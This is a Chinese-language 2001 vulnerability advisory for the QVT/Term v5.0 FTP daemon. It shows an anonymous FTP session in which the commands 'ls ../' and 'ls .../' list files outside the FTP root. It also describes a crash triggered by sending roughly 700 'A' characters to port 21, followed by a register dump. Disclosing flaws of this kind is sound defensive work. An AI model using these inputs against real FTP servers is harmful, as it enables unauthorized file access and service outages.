QVT/Term 存在缓冲溢出漏洞发布时间:2001-09-27 更新时间:2001-09-27 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 QVT/Term v5.0详细描述 QVT/Term v5.0 是http://www.qpc.com/下的一套interenet工具,其中在FTP 守护程序中存在两个漏洞,第一允许远程用户列出FTP目录以外的文件,第二个 允许远程用户使服务器崩溃。 测试代码 下面的测试存在目录遍历: > ftp localhost Connected to xxxxxxxxx.rh.rit.edu. 220 xxxxxxxxx FTP server (QVT/Net 4.3) ready. User (xxxxxxxxx.rh.rit.edu:(none)): anonymous 331 Guest login OK, please send real ident as password. Password: 230 Guest login OK, access restrictions apply. ftp> ls ../ 200 PORT command successful. 150 Opened data connection for 'ls' (xxxxxxxxx,1048) (0 bytes). root 226 Transfer complete. ftp: 6 bytes received in 0.05Seconds 0.12Kbytes/sec. ftp> ls .../ [file listing of C:\ is shown here] 226 Transfer complete. ftp: 1192 bytes received in 0.11Seconds 10.84Kbytes/sec. ftp> 远程用户连接到21口然后发送超长的‘A’大约700个字节左右会导致服务崩溃。 FTPD caused an invalid page fault in module FTPD.EXE at 017f:00404b34. Registers: EAX=0000200a CS=017f EIP=00404b34 EFLGS=00010213 EBX=0066799b SS=0187 ESP=0064fac8 EBP=00666a58 ECX=0000066c DS=0187 ESI=00667ff3 FS=1bb7 EDX=006699a5 ES=0187 EDI=00669ffd GS=0000 Bytes at CS:EIP: f3 a5 8b c8 68 70 fc 40 00 83 e1 03 53 f3 a4 8b Stack dump: 00000004 00771b90 00666a58 0064fbc0 0000060a 12948ae8 00771b90 004105a0 00288b30 bff728a2 0187bff7 bff713e2 12948b04 0a2c175f 12990002 00288b4c 解决方案 尚无 相关信息 e-mail: joetesta@hushmail.com web page: http://hogs.rit.edu/~joet/ |
